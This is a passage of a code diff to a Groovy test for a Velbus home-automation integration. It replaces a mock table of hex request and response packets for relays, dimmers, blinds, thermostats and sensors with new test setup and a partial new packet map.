-            // Module Type request for address 1 - return VMBGP1 Packets
-            "0F FB 01 40 B5 04 00 00 00 00 00 00 00 00": [
-                "0F FB 01 07 FF 1E 00 02 01 16 12 A6 04 00",
-                "0F FB 01 08 B0 1E 00 02 02 FF FF FF 1E 04"
-            ],
-
-            // Module Status request for address 1 - return
-            "0F FB 01 02 FA 00 F9 04 00 00 00 00 00 00": [
-                "0F FB 01 07 ED 00 FF FF 00 00 00 03 04"
-            ],
-
-            // CH8 lock for 1s
-            "0F F8 30 05 12 08 00 00 01 A9 04 00 00 00": [
-                "0F FB 30 07 ED 00 FF FF 80 00 8D C7 04 00"
-            ],
-
-            // CH8 lock indefinitely
-            "0F F8 30 05 12 08 FF FF FF AD 04 00 00 00": [
-                "0F FB 30 07 ED 00 FF FF 80 00 8D C7 04 00"
-            ],
-
-            // CH8 unlock
-            "0F F8 30 02 13 08 AC 04 00 00 00 00 00 00": [
-                "0F FB 30 07 ED 00 FF FF 00 00 8D 47 04 00"
-            ],
-
-            // Module Type request for address 10 - return VMB7IN
-            "0F FB 0A 40 AC 04 00 00 00 00 00 00 00 00": [
-                "0F FB 0A 07 FF 22 E7 9C 03 15 37 F2 04 00"
-            ],
-
-            // Module status request for address 10
-            "0F FB 0A 02 FA 00 F0 04 00 00 00 00 00 00": [
-                "0F FB 0A 07 ED 01 7F FF 00 00 C0 B9 04 00"
-            ],
-
-            /*
-            * THERMOSTAT PROCESSOR PACKETS
-            */
-            // Module Type request for address 3 - return VMBGP1 Packets with disabled thermostat
-            "0F FB 03 40 B3 04 00 00 00 00 00 00 00 00": [
-                "0F FB 03 07 FF 1E 00 02 01 16 12 A4 04 00",
-                "0F FB 03 08 B0 1E 00 02 FF FF FF FF 1F 04"
-            ],
-
-            // Thermostat Status request for address 48
-            "0F FB 30 02 E7 00 DD 04 00 00 00 00 00 00": [
-                "0F FB 30 08 EA 00 00 10 38 18 00 00 74 04",
-                "0F FB 30 08 E8 18 32 2C 20 18 06 01 21 04",
-                "0F FB 30 08 E9 2A 2E 34 48 00 3C 05 C0 04"
-            ],
-
-            // Set temperature of Heat Night mode to 20.5
-            "0F FB 30 03 E4 03 29 B3 04 00 00 00 00 00": [
-                "0F FB 30 08 EA 00 00 10 38 18 00 00 74 04",
-                "0F FB 30 08 E8 18 32 2C 29 18 06 01 18 04",
-                "0F FB 30 08 E9 2A 2E 34 48 00 3C 05 C0 04"
-            ],
-
-            // Set thermostat disabled state
-            "0F F8 30 05 12 21 FF FF FF 94 04 00 00 00": [
-                "0F FB 30 08 EA 06 00 10 38 18 00 00 6E 04"
-            ],
-
-            // Unlock thermostat
-            "0F F8 30 02 13 21 93 04 00 00 00 00 00 00": [
-                "0F FB 30 08 EA 00 00 10 38 18 00 00 74 04"
-            ],
-
-            // Set thermostat manual state (HEAT_SAFE)
-            "0F FB 30 03 DE FF FF E7 04 00 00 00 00 00": [
-                "0F FB 30 08 EA 02 00 10 38 18 00 00 72 04"
-            ],
-
-            // Set to normal mode (HEAT_SAFE)
-            "0F FB 30 03 DE 00 00 E5 04 00 00 00 00 00": [
-                "0F FB 30 08 EA 00 00 10 38 18 00 00 74 04"
-            ],
-
-            // Set to HEAT_COMFORT mode 1 min
-            "0F FB 30 03 DB 00 01 E7 04 00 00 00 00 00": [
-                "0F FB 30 08 EA 44 00 10 38 32 00 01 15 04"
-            ],
-
-            // Set thermostat manual state (HEAT_COMFORT)
-            "0F FB 30 03 DB FF FF EA 04 00 00 00 00 00": [
-                "0F FB 30 08 EA 42 00 10 37 32 00 00 19 04"
-            ],
-
-            // Set to HEAT SAFE until next program step
-            "0F FB 30 03 DE FF 00 E6 04 00 00 00 00 00": [
-                "0F FB 30 08 EA 00 00 10 38 18 00 00 74 04"
-            ],
-
-            // Set to normal mode (HEAT_COMFORT)
-            "0F FB 30 03 DB 00 00 E8 04 00 00 00 00 00": [
-                "0F FB 30 08 EA 40 00 10 37 32 00 00 1B 04"
-            ],
-
-            // Set to COOL_DAY mode until next program step
-            "0F FB 30 03 DC FF 00 E8 04 00 00 00 00 00": [
-                "0F FB 30 08 EA A0 00 10 37 2E 00 00 BF 04"
-            ],
-
-            /*
-            * PROGRAMS PROCESSOR PACKETS
-            */
-
-            // Read memory block (alarm1 times)
-            "0F FB 30 03 C9 02 85 73 04 00 00 00 00 00": [
-                "0F FB 30 07 CC 02 85 10 00 16 00 46 04 00"
-            ],
-
-            // Read memory block (alarm2 times)
-            "0F FB 30 03 C9 02 89 6F 04 00 00 00 00 00": [
-                "0F FB 30 07 CC 02 89 08 00 17 00 49 04 00"
-            ],
-
-            // Set alarm1 disabled
-            "0F FB 00 07 C3 01 10 00 16 00 00 05 04 00": [
-                "0F FB 30 07 ED 00 FF FF 00 00 89 4B 04 00",
-                "0F FB 31 07 ED 00 FF FF 00 10 89 3A 04 00",
-                "0F FB 32 07 ED 00 FF FF 00 00 89 49 04 00",
-                "0F FB 33 07 ED 00 FF FF 00 00 89 48 04 00"
-            ],
-
-            // Set alarm2 enabled
-            "0F FB 30 07 C3 02 08 00 17 00 01 DA 04 00": [
-                "0F FB 30 07 ED 00 FF FF 00 00 99 3B 04 00",
-                "0F FB 31 07 ED 00 FF FF 00 10 99 2A 04 00",
-                "0F FB 32 07 ED 00 FF FF 00 00 99 39 04 00",
-                "0F FB 33 07 ED 00 FF FF 00 00 99 38 04 00"
-            ],
-
-            // Set sunrise enabled
-            "0F FB 30 03 AE FF 03 13 04 00 00 00 00 00": [
-                "0F FB 30 07 ED 00 FF FF 00 00 D9 FB 04 00",
-                "0F FB 31 07 ED 00 FF FF 00 10 D9 EA 04 00",
-                "0F FB 32 07 ED 00 FF FF 00 00 D9 F9 04 00",
-                "0F FB 33 07 ED 00 FF FF 00 00 D9 F8 04 00"
-            ],
-
-            // Set sunset disabled
-            "0F FB 30 03 AE FF 01 15 04 00 00 00 00 00": [
-                "0F FB 30 07 ED 00 FF FF 00 00 59 7B 04 00",
-                "0F FB 31 07 ED 00 FF FF 00 10 59 6A 04 00",
-                "0F FB 32 07 ED 00 FF FF 00 00 59 79 04 00",
-                "0F FB 33 07 ED 00 FF FF 00 00 59 78 04 00"
-            ],
-
-            // Enable program steps CH13
-            "0F FB 30 02 B2 0D 05 04 00 00 00 00 00 00": [
-                "0F FB 30 07 ED 00 FF FF 00 00 99 3B 04 00",
-                "0F FB 31 07 ED 00 FF FF 00 00 99 3A 04 00",
-                "0F FB 32 07 ED 00 FF FF 00 00 99 39 04 00",
-                "0F FB 33 07 ED 00 FF FF 00 00 99 38 04 00"
-            ],
-
-            // Disable program steps all channels for 1s
-            "0F FB 30 05 B1 FF 00 00 01 10 04 00 00 00": [
-                "0F FB 30 07 ED 00 FF FF 00 FF 99 3C 04 00",
-                "0F FB 31 07 ED 00 FF FF 00 FF 99 3B 04 00",
-                "0F FB 32 07 ED 00 FF FF 00 FF 99 3A 04 00",
-                "0F FB 33 07 ED 00 FF FF 00 FF 99 39 04 00"
-            ],
-
-            // Disable CH20 program steps for 1s
-            "0F FB 30 05 B1 14 00 00 01 FB 04 00 00 00": [
-                "0F FB 30 07 ED 00 FF FF 00 00 99 3B 04 00",
-                "0F FB 31 07 ED 00 FF FF 00 00 99 3A 04 00",
-                "0F FB 32 07 ED 00 FF FF 00 08 99 31 04 00",
-                "0F FB 33 07 ED 00 FF FF 00 00 99 38 04 00"
-            ],
-
-            // Select winter program
-            "0F FB 30 02 B3 02 0F 04 00 00 00 00 00 00": [
-                "0F FB 30 07 ED 00 FF FF 00 00 5A 7A 04 00",
-                "0F FB 31 07 ED 00 FF FF 00 00 5A 79 04 00",
-                "0F FB 32 07 ED 00 FF FF 00 00 5A 78 04 00",
-                "0F FB 33 07 ED 00 FF FF 00 00 5A 77 04 00"
-            ],
-
-            /*
-            * RELAY PROCESSOR PACKETS
-            */
-
-            // Module Type request for address 81 - return VMB1RYNO Packets
-            "0F FB 51 40 65 04 00 00 00 00 00 00 00 00": [
-                "0F FB 51 07 FF 1B E1 74 00 13 25 F7 04 00"
-            ],
-
-            // Relay Status request for address 81
-            "0F FB 51 02 FA 1F 8A 04 00 00 00 00 00 00": [
-                "0F FB 51 08 FB 01 00 00 00 00 00 00 A1 04",
-                "0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04",
-                "0F FB 51 08 FB 04 00 00 00 00 00 00 9E 04",
-                "0F FB 51 08 FB 08 00 00 00 00 00 00 9A 04",
-                "0F FB 51 08 FB 10 00 00 00 00 00 00 92 04"
-            ],
-
-            // Switch on CH4 relay
-            "0F F8 51 02 02 08 9C 04 00 00 00 00 00 00": [
-                "0F FB 51 08 FB 08 00 01 80 00 00 00 19 04"
-            ],
-
-            // Switch off CH4 relay
-            "0F F8 51 02 01 08 9D 04 00 00 00 00 00 00": [
-                "0F FB 51 08 FB 08 00 00 00 00 00 00 9A 04"
-            ],
-
-            // Switch CH1 to intermittent
-            "0F F8 51 05 0D 01 FF FF FF 98 04 00 00 00": [
-                "0F FB 51 08 FB 01 00 03 20 FF FF FE 82 04",
-                "0F FB 40 02 F8 01 BB 04 00 00 00 00 00 00",
-                "0F F8 51 04 00 01 00 00 A3 04 00 00 00"
-            ],
-
-            // Switch CH1 off
-            "0F F8 51 02 01 01 A4 04 00 00 00 00 00 00": [
-                "0F FB 40 02 F5 01 BE 04 00 00 00 00 00 00",
-                "0F FB 51 08 FB 01 00 00 00 00 00 00 A1 04",
-                "0F F8 51 04 00 00 01 00 A3 04 00 00 00 00"
-            ],
-
-            // CH2 to intermittent for 1s
-            "0F F8 51 05 0D 02 00 00 01 93 04 00 00 00": [
-                "0F FB 51 08 FB 02 00 03 20 00 00 01 7C 04",
-                "0F F8 51 04 00 02 00 00 A2 04 00 00 00"
-            ],
-
-            // CH2 to intermittent indefinitely
-            "0F F8 51 05 0D 02 FF FF FF 97 04 00 00 00": [
-                "0F FB 51 08 FB 02 00 03 20 00 00 00 7D 04",
-                "0F F8 51 04 00 02 00 00 A2 04 00 00 00",
-
-            ],
-
-            // CH2 off
-            "0F F8 51 02 01 02 A3 04 00 00 00 00 00 00": [
-                "0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"
-            ],
-
-            // Inhibit channel 2 for 1s
-            "0F F8 51 05 16 02 00 00 01 8A 04 00 00 00": [
-                "0F FB 51 08 FB 02 01 00 00 00 00 00 9F 04"
-            ],
-
-            // Inhibit channel 2 indefinitely
-            "0F F8 51 05 16 02 FF FF FF 8E 04 00 00 00": [
-                "0F FB 51 08 FB 02 01 00 00 00 00 00 9F 04"
-            ],
-
-            // Cancel channel 2 inhibit
-            "0F F8 51 02 17 02 8D 04 00 00 00 00 ": [
-                "0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"
-            ],
-
-            // Force channel 3 on for 1s
-            "0F F8 51 05 14 04 00 00 01 8A 04 00 00 00": [
-                "0F FB 30 02 F6 02 CC 04 00 00 00 00 00 00",
-                "0F FB 51 08 FB 04 02 01 80 00 00 00 1B 04",
-                "0F F8 51 04 00 04 00 00 A0 04 00 00 00 00"
-            ],
-
-            // Force channel 1 off for 1s
-            "0F F8 51 05 12 01 00 00 01 8F 04 00 00 00": [
-                "0F FB 51 08 FB 01 03 00 00 00 00 00 9E 04",
-                "0F FB 40 02 F5 01 BE 04 00 00 00 00 00 00"
-            ],
-
-            // Channel 1 on for 1s
-            "0F F8 51 05 03 01 00 00 01 9E 04 00 00 00": [
-                "0F FB 40 02 F8 01 BB 04 00 00 00 00 00 00",
-                "0F FB 51 08 FB 01 00 01 20 00 00 01 7F 04",
-                "0F F8 51 04 00 01 00 00 A3 04 00 00 00 00"
-            ],
-
-            // Channel 1 on indefinitely
-            "0F F8 51 05 03 01 FF FF FF A2 04 00 00 00": [
-                "0F FB 40 02 F6 01 BD 04 00 00 00 00 00 00",
-                "0F FB 51 08 FB 01 00 01 80 00 00 00 20 04",
-                "0F F8 51 04 00 01 00 00 A3 04 00 00 00 00"
-            ],
-
-            // CH2 lock for 1s
-            "0F F8 51 05 12 02 00 00 01 8E 04 00 00 00": [
-                "0F FB 51 08 FB 02 03 00 00 00 00 00 9D 04"
-            ],
-
-            // CH2 lock indefinitely
-            "0F F8 51 05 12 02 FF FF FF 92 04 00 00 00": [
-                "0F FB 51 08 FB 02 03 00 00 00 00 00 9D 04"
-            ],
-
-            // CH2 lock cancel
-            "0F F8 51 02 13 02 91 04 00 00 00 00 00 00": [
-                "0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"
-            ],
-
-            /*
-            * COUNTER PROCESSOR PACKETS
-            */
-
-            // Read memory from address 10 (counter data)
-            "0F FB 0A 03 FD 03 FE EB 04 00 00 00 00 00": [
-                "0F FB 0A 04 FE 03 FE FD EC 04 00 00 00 00"
-            ],
-
-            // Counter status
-            "0F FB 0A 03 BD 0F 00 1D 04 00 00 00 00 00": [
-                "0F FB 0A 08 BE 68 00 00 00 00 FF FF C0 04",
-                "0F FB 0A 08 BE 11 00 00 00 00 FF FF 17 04"
-            ],
-
-            // Counter 1 reset
-            "0F FB 0A 02 AD 00 3D 04 00 00 00 00 00 00": [
-                "0F FB 0A 08 BE 68 00 00 00 00 FF FF C0 04"
-            ],
-
-            /*
-            * DIMMER PROCESSOR PACKETS
-            */
-
-            // Module Type request for address 187 - return VMB4DC Packets
-            "0F FB BB 40 FB 04 00 00 00 00 00 00 00 00": [
-                "0F FB BB 07 FF 12 AB 31 03 15 09 26 04 00"
-            ],
-
-            // Dimmer Status request for address 187
-            "0F FB BB 02 FA 0F 30 04 00 00 00 00 00 00": [
-                "0F FB BB 08 B8 01 00 00 00 00 00 00 7A 04",
-                "0F FB BB 08 B8 02 00 00 00 00 00 00 79 04",
-                "0F FB BB 08 B8 04 00 00 00 00 00 00 77 04",
-                "0F FB BB 08 B8 08 00 00 00 00 00 00 73 04"
-            ],
-
-            // Switch dimmer channel on
-            "0F F8 BB 05 07 08 64 00 00 C6 04 00 00 00": [
-                "0F FB BB 08 B8 08 00 00 20 00 00 00 53 04",
-                "0F F8 BB 04 00 08 00 00 32 04 00 00 00 00",
-                "0F FB BB 08 B8 08 00 64 80 00 00 00 8F 04"
-            ],
-
-            // Switch dimmer channel off
-            "0F F8 BB 05 07 08 00 00 00 2A 04 00 00 00": [
-                "0F FB BB 08 B8 08 00 63 80 00 00 00 90 04",
-                "0F F8 BB 04 00 00 08 00 32 04 00 00 00 00",
-                "0F FB BB 08 B8 08 00 00 00 00 00 00 73 04"
-            ],
-
-            // Set dimmer to 50%
-            "0F F8 BB 05 07 08 32 00 00 F8 04 00 00 00": [
-                "0F FB BB 08 B8 08 00 00 20 00 00 00 53 04",
-                "0F F8 BB 04 00 08 00 00 32 04 00 00 00 00",
-                "0F FB BB 08 B8 08 00 32 80 00 00 00 C1 04"
-            ],
-
-            // Set dimmer to last level (50%)
-            "0F F8 BB 05 11 08 00 00 00 20 04 00 00 00": [
-                "0F FB BB 08 B8 08 00 01 00 00 00 00 72 04",
-                "0F F8 BB 04 00 08 00 00 32 04 00 00 00 00",
-                "0F FB BB 08 B8 08 00 32 80 00 00 00 C1 04"
-            ],
-
-            // Set dimmer to 75% over 7s
-            "0F F8 BB 05 07 02 4B 00 07 DE 04 00 00 00": [
-                "0F FB BB 08 B8 02 00 00 00 00 00 00 79 04",
-                "0F F8 BB 04 00 02 00 00 38 04 00 00 00 00",
-                "0F FB BB 08 B8 02 00 1A 20 00 00 00 3F 04",
-                "0F FB BB 08 B8 02 00 33 20 00 00 00 26 04",
-                "0F FB BB 08 B8 02 00 4B 80 00 00 00 AE 04"
-            ],
-
-            // CH2 off
-            "0F F8 BB 05 07 02 00 00 00 30 04 00 00 00": [
-                "0F FB BB 08 B8 02 00 4B 80 00 00 00 AE 04",
-                "0F F8 BB 04 00 00 02 00 38 04 00 00 00 00",
-                "0F FB BB 08 B8 02 00 00 00 00 00 00 79 04"
-            ],
-
-            // CH2 on
-            "0F F8 BB 05 07 02 64 00 00 CC 04 00 00 00": [
-                "0F FB BB 08 B8 02 00 01 20 00 00 00 58 04",
-                "0F F8 BB 04 00 02 00 00 38 04 00 00 00 00",
-                "0F FB BB 08 B8 02 00 08 20 00 00 03 4E 04"
-            ],
-
-            // CH2 on for 3s
-            "0F F8 BB 05 08 02 00 00 03 2C 04 00 00 00": [
-                "0F FB BB 08 B8 02 00 08 20 00 00 03 4E 04"
-            ],
-
-            // CH2 to 50% over 60s
-            "0F F8 BB 05 07 02 32 00 3C C2 04 00 00 00": [
-                "0F FB BB 08 B8 02 00 00 20 00 00 00 59 04",
-                "0F F8 BB 04 00 02 00 00 38 04 00 00 00 00",
-                "0F FB BB 08 B8 02 00 15 20 00 00 00 44 04"
-            ],
-
-            // CH2 halt
-            "0F F8 BB 02 10 02 2A 04 00 00 00 00 00 00": [
-                "0F FB BB 08 B8 02 00 02 80 00 00 00 F7 04"
-            ],
-
-            // CH3 inhibit for 1s
-            "0F F8 BB 05 16 04 00 00 01 1E 04 00 00 00": [
-                "0F FB BB 08 B8 04 01 00 00 00 00 00 76 04"
-            ],
-
-            // CH3 inhibit indefinitely
-            "0F F8 BB 05 16 04 FF FF FF 22 04 00 00 00": [
-                "0F FB BB 08 B8 04 01 00 00 00 00 00 76 04"
-            ],
-
-            // CH3 inhibit cancel
-            "0F F8 BB 02 17 04 21 04 00 00 00 00 00 00": [
-                "0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"
-            ],
-
-            // CH3 force on 5s
-            "0F F8 BB 05 14 04 00 00 05 1C 04 00 00 00": [
-                "0F F8 BB 04 00 04 00 00 36 04 00 00 00 00",
-                "0F FB BB 08 B8 04 02 64 80 00 00 00 91 04"
-            ],
-
-            // CH3 on
-            "0F F8 BB 05 07 04 64 00 00 CA 04 00 00 00": [
-                "0F FB BB 08 B8 04 00 00 00 00 00 00 77 04",
-                "0F FB BB 08 B8 04 00 00 20 00 00 00 57 04",
-                "0F F8 BB 04 00 04 00 00 36 04 00 00 00 00"
-            ],
-
-            // CH3 on indefinitely
-            "0F F8 BB 05 08 04 FF FF FF 30 04 00 00 00": [
-                "0F FB BB 08 B8 04 00 64 80 00 00 00 93 04"
-            ],
-
-            // CH3 off
-            "0F F8 BB 05 07 04 00 00 00 2E 04 00 00 00": [
-                "0F FB BB 08 B8 04 00 63 80 00 00 00 94 04",
-                "0F F8 BB 04 00 00 04 00 36 04 00 00 00 00",
-                "0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"
-            ],
-
-            // CH3 lock for 1s
-            "0F F8 BB 05 12 04 00 00 01 22 04 00 00 00": [
-                "0F FB BB 08 B8 04 00 00 00 00 00 00 77 04",
-                "0F FB BB 08 B8 04 03 00 00 00 00 00 74 04"
-            ],
-
-            // CH3 lock indefinitely
-            "0F F8 BB 05 12 04 FF FF FF 26 04 00 00 00": [
-                "0F FB BB 08 B8 04 03 00 00 00 00 00 74 04"
-            ],
-
-            // CH3 lock cancel
-            "0F F8 BB 02 13 04 25 04 00 00 00 00 00 00": [
-                "0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"
-            ],
-
-            /*
-            * BLIND PROCESSOR PACKETS
-            */
-
-            // Module Type request for address 97 - return VMB2BLE Packets
-            "0F FB 61 40 55 04 00 00 00 00 00 00 00 00": [
-                "0F FB 61 07 FF 1D C4 56 00 13 25 20 04 00"
-            ],
-
-            // CH1 status request
-            "0F FB 61 02 FA 01 98 04 00 00 00 00 00 00": [
-                "0F FB 61 08 EC 01 08 00 00 00 00 00 98 04"
-            ],
-
-            // CH2 status request
-            "0F FB 61 02 FA 02 97 04 00 00 00 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"
-            ],
-
-            // CH2 down
-            "0F F8 61 05 06 02 00 00 00 8B 04 00 00 00": [
-                "0F FB 61 08 EC 02 09 02 20 00 00 00 74 04",
-                "0F F8 61 04 00 08 00 00 8C 04 00 00 00 00"
-            ],
-
-            // CH2 up
-            "0F F8 61 05 05 02 00 00 00 8C 04 00 00 00": [
-                "0F FB 61 08 EC 02 09 01 02 64 00 00 2F 04",
-                "0F F8 61 04 00 04 00 00 90 04 00 00 00 00"
-            ],
-
-            // CH2 50%
-            "0F F8 61 03 1C 02 32 45 04 00 00 00 00 00": [
-                "0F FB 61 08 EC 02 09 02 20 00 00 00 74 04",
-                "0F F8 61 04 00 08 00 00 8C 04 00 00 00 00"
-            ],
-
-            // CH2 up for 10s
-            "0F F8 61 05 05 02 00 00 0A 82 04 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 02 32 00 00 62 04",
-                "0F FB 61 08 EC 02 09 01 02 32 00 00 61 04",
-                "0F F8 61 04 00 04 00 00 90 04 00 00 00 00"
-            ],
-
-            // CH2 down for 15s
-            "0F F8 61 05 06 02 00 00 0F 7C 04 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 20 00 00 00 76 04",
-                "0F FB 61 08 EC 02 09 02 20 00 00 00 74 04",
-                "0F F8 61 04 00 08 00 00 8C 04 00 00 00 00"
-            ],
-
-            // CH2 halt
-            "0F F8 61 02 04 02 90 04 00 00 00 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 00 63 00 00 33 04",
-                "0F F8 61 04 00 00 04 00 90 04 00 00 00 00",
-            ],
-
-            // CH2 inhibit 1s
-            "0F F8 61 05 16 02 00 00 01 7A 04 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 00 63 01 00 32 04",
-                "0F F8 61 04 00 04 00 00 90 04 00 00 00 00"
-            ],
-
-            // CH2 inhibit indefinitely
-            "0F F8 61 05 16 02 FF FF FF 7E 04 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 00 00 01 00 95 04"
-            ],
-
-            // CH2 inhibit cancel
-            "0F F8 61 02 17 02 7D 04 00 00 00 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"
-            ],
-
-            // CH2 inhibit down indefinitely
-            "0F F8 61 05 19 02 FF FF FF 7B 04 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 20 00 02 00 74 04",
-                "0F FB 61 08 EC 02 09 02 20 00 02 00 72 04",
-                "0F F8 61 04 00 08 00 00 8C 04 00 00 00 00",
-                "0F FB 61 08 EC 02 09 00 00 64 02 00 30 04",
-                "0F F8 61 04 00 00 08 00 8C 04 00 00 00 00"
-            ],
-
-            // CH2 force up for 5s
-            "0F F8 61 05 12 02 00 00 05 7A 04 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 02 64 05 00 2B 04",
-                "0F FB 61 08 EC 02 09 01 02 64 05 00 2A 04",
-                "0F F8 61 04 00 04 00 00 90 04 00 00 00 00"
-            ],
-
-            // CH2 locked for 1s
-            "0F F8 61 05 1A 02 00 00 01 76 04 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 00 00 06 00 90 04"
-            ],
-
-            // CH2 locked indefinitely
-            "0F F8 61 05 1A 02 FF FF FF 7A 04 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 00 00 06 00 90 04"
-            ],
-
-            // CH2 lock cancel
-            "0F F8 61 02 1B 02 79 04 00 00 00 00 00 00": [
-                "0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"
-            ],
-
-            /*
-            * METEO PROCESSOR PACKETS
-            */
-
-            // Module type request address 254 (VMBMETEO)
-            "0F FB FE 40 B8 04 00 00 00 00 00 00 00 00": [
-                "0F FB FE 07 FF 31 E7 6C 01 16 26 31 04 00"
-            ],
-
-            // Input status
-            "0F FB FE 02 FA 00 FC 04 00 00 00 00 00 00": [
-                "0F FB FE 07 ED 02 00 00 FD 0A 00 FB 04 00"
-            ],
-
-            // Meteo status
-            "0F FB FE 03 E5 0F 00 01 04 00 00 00 00 00": [
-                "0F FB FE 07 A9 00 00 36 E5 00 00 2D 04 00",
-                "0F FB FE 07 E6 2C 6F FE E3 57 E5 53 04 00"
-            ],
-
-            // Programs memory read
-            "0F FB FE 03 C9 00 84 A8 04 00 00 00 00 00": [
-                "0F FB FE 07 CC 00 84 06 0F 16 00 76 04 00",
-                "0F FB FE 07 CC 00 88 08 1E 16 1E 43 04 00"
-            ],
-
-            /*
-            * VMBPIRO PACKETS
-            */
-
-            // Module type request address 8 (VMBPIRO)
-            "0F FB 08 40 AE 04 00 00 00 00 00 00 00 00": [
-                "0F FB 08 07 FF 2C 14 05 01 15 19 74 04 00"
-            ],
-
-            // Input status
-            "0F FB 08 02 FA 00 F2 04 00 00 00 00 00 00": [
-                "0F FB 08 08 ED 02 02 40 00 00 C0 01 F4 04",
-                "0F FB 08 07 E6 3B 40 28 00 3B 60 C3 04 00"
-            ],
-
-            // Programs memory read alarm 1
-            "0F FB 08 03 C9 00 32 F0 04 00 00 00 00 00": [
-                "0F FB 08 07 CC 00 32 07 00 16 00 CC 04 00"
-            ],
-
-            // Programs memory read alarm 2
-            "0F FB 08 03 C9 00 36 EC 04 00 00 00 00 00": [
-                "0F FB 08 07 CC 00 36 08 00 17 00 C6 04 00"
-            ],
-
-            /*
-            * VMB1TS PACKETS
-            */
-
-            // Module type request address 5 (VMB1TS)
-            "0F FB 05 40 B1 04 00 00 00 00 00 00 00 00": [
-                "0F FB 05 08 FF 0C 00 38 DD 01 12 47 6F 04"
-            ],
-
-            // Input status
-            "0F FB 05 02 FA 00 F5 04 00 00 00 00 00 00": [
-                "0F FB 05 08 EA 00 00 40 3B 0A 00 00 7A 04"
-            ],
-
-            // Current Temp status
-            "0F FB 05 02 E5 00 0A 04 00 00 00 00 00 00": [
-                "0F FB 05 07 E6 3B C0 26 A0 3C 80 87 04 00"
-            ],
-
-            // Temp status
-            "0F FB 05 02 E7 00 08 04 00 00 00 00 00 00": [
-                "0F FB 05 08 E8 0A 2C 28 1E 0A 06 01 74 04",
-                "0F FB 05 08 E9 2A 2E 34 48 00 3C 00 F0 04"
-            ]
-        ]
+  @Shared
+  def static VelbusNetwork network
+
+  @Shared
+  def static MockVelbusClient messageProcessor = new MockVelbusClient()
+
+  @Shared
+  def static PollingConditions conditions = new PollingConditions(timeout: 5, delay: 0.2)
+
+  static loadDevicePackets(MockVelbusClient messageProcessor) {
+    messageProcessor.mockPackets = [
+
+      /*
+       * INPUT BUTTON PROCESSOR PACKETS
+       */
+
+      // Module type request for address 1 - return VMB4AN packets
+      "0F FB 02 40 B4 04 00 00 00 00 00 00 00 00": ["0F FB 02 07 FF 32 00 01 01 17 25 7E 04 00"],
+
+      // Module Status for address 2
+      "0F FB 02 02 FA FF F9 04 00 00 00 00 00 00": [
+        "0F FB 02 06 ED 10 04 00 01 00 EC 04 00 00",
+        "0F FB 02 08 B8 0C 00 00 00 00 00 00 28 04",
+        "0F FB 02 08 B8 0D 00 00 00 00 00 00 27 04",
+        "0F FB 02 08 B8 0E 00 00 00 00 00 00 26 04",
+        "0F FB 02 08 B8 0F 00 00 00 00 00 00 25 04"
+      ],
+
+      // Read memory 1 address 2
+      "0F FB 02 03 C9 00 46 E2 04 00 00 00 00 00": ["0F FB 02 07 CC 00 46 07 00 16 00 BE 04 00"],
+
+      // Read memory 2 address 2
+      "0F FB 02 03 C9 00 4A DE 04 00 00 00 00 00": ["0F FB 02 07 CC 00 4A 08 00 17 00 B8 04 00"],
+
+      // VMB4AN Sensor 1 Readout
+      "0F FB 02 03 E5 08 00 04 04 00 00 00 00 00": [
+        "0F FB 02 06 A9 08 02 00 11 27 03 04 00 00",
+        "0F FB 02 08 AC 08 00 32 35 2E 32 B0 C1 04",
+        "0F FB 02 05 AC 08 05 43 00 F3 04 00 00 00",
+        "0F FB 02 07 EA 08 06 00 00 0A 0A E1 04 00"
+      ],
+
+      // VMB4AN Sensor 2 Readout
+      "0F FB 02 03 E5 09 00 03 04 00 00 00 00 00": [
+        "0F FB 02 06 A9 09 01 00 00 0E 2D 04 00 00",
+        "0F FB 02 08 AC 09 00 30 55 6E 69 74 67 04",
+        "0F FB 02 04 AC 09 05 00 36 04 00 00 00 00",
+        "0F FB 02 07 EA 09 05 00 00 01 01 F3 04 00"
+      ],
+
+      // VMB4AN Sensor 3 Readout
+      "0F FB 02 03 E5 0A 00 02 04 00 00 00 00 00": [
+        "0F FB 02 06 A9 0A 00 00 00 2B 10 04 00 00",
+        "0F FB 02 08 AC 0A 00 30 55 6E 69 74 66 04",
+        "0F FB 02 04 AC 0A 05 00 35 04 00 00 00 00",
+        "0F FB 02 07 EA 0A 04 00 00 01 01 F3 04 00"
+      ],
+
+      // VMB4AN Sensor 4 Readout
+      "0F FB 02 03 E5 0B 00 01 04 00 00 00 00 00": [
+        "0F FB 02 06 A9 0B 00 00 00 2B 0F 04 00 00",
+        "0F FB 02 08 AC 0B 00 30 55 6E 69 74 65 04",
+        "0F FB 02 04 AC 0B 05 00 34 04 00 00 00 00",
+        "0F FB 02 07 EA 0B 04 00 00 01 01 F2 04 00"
+      ],
+
+      // VMB4AN Sensor 1 Settings
+      "0F FB 02 02 E7 08 03 04 00 00 00 00 00 00": [
+        "0F FB 02 08 E8 08 FF FF FF 00 0C 8C 67 04",
+        "0F FB 02 08 E9 08 FF 00 00 FF FF FF FF 04"
+      ],
+
+      // VMB4AN Sensor 2 Settings
+      "0F FB 02 02 E7 09 02 04 00 00 00 00 00 00": [
+        "0F FB 02 08 E8 09 FF FF FF 00 00 00 FE 04",
+        "0F FB 02 08 E9 09 FF FF FF FF FF FF 00 04"
+      ],
+
+      // VMB4AN Sensor 3 Settings
+      "0F FB 02 02 E7 0A 01 04 00 00 00 00 00 00": [
+        "0F FB 02 08 E8 0A FF FF FF FF FF 00 FF 04",
+        "0F FB 02 08 E9 0A FF FF FF FF FF FF FF 04"
+      ],
+
+      // VMB4AN Sensor 4 Settings
+      "0F FB 02 02 E7 0B 00 04 00 00 00 00 00 00": [
